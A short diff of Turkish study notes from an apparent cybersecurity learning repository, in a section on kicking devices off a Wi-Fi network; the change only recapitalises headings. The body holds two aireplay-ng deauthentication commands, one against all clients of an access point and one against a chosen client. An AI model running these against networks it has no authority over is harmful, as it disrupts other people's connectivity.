omerapaydin/SiberGuvenlik/aglara_giris/aglar_bilgi_toplama.md

 ## Ağdan Atma

---Tüm cihazları ağdan atma--
+--Tüm Cihazları Ağdan Atma--

 ~aireplay-ng --deauth 10000 -a E4:C3:2A:B7:23:90 wlam0mon

---Belirli cihazları ağdan atma--
+--Belirli Cihazları Ağdan Atma--

 ~aireplay-ng --deauth 10000 -a E4:C3:2A:B7:23:90 -c {atmak istediğimiz ağın mac adresi} wlam0mon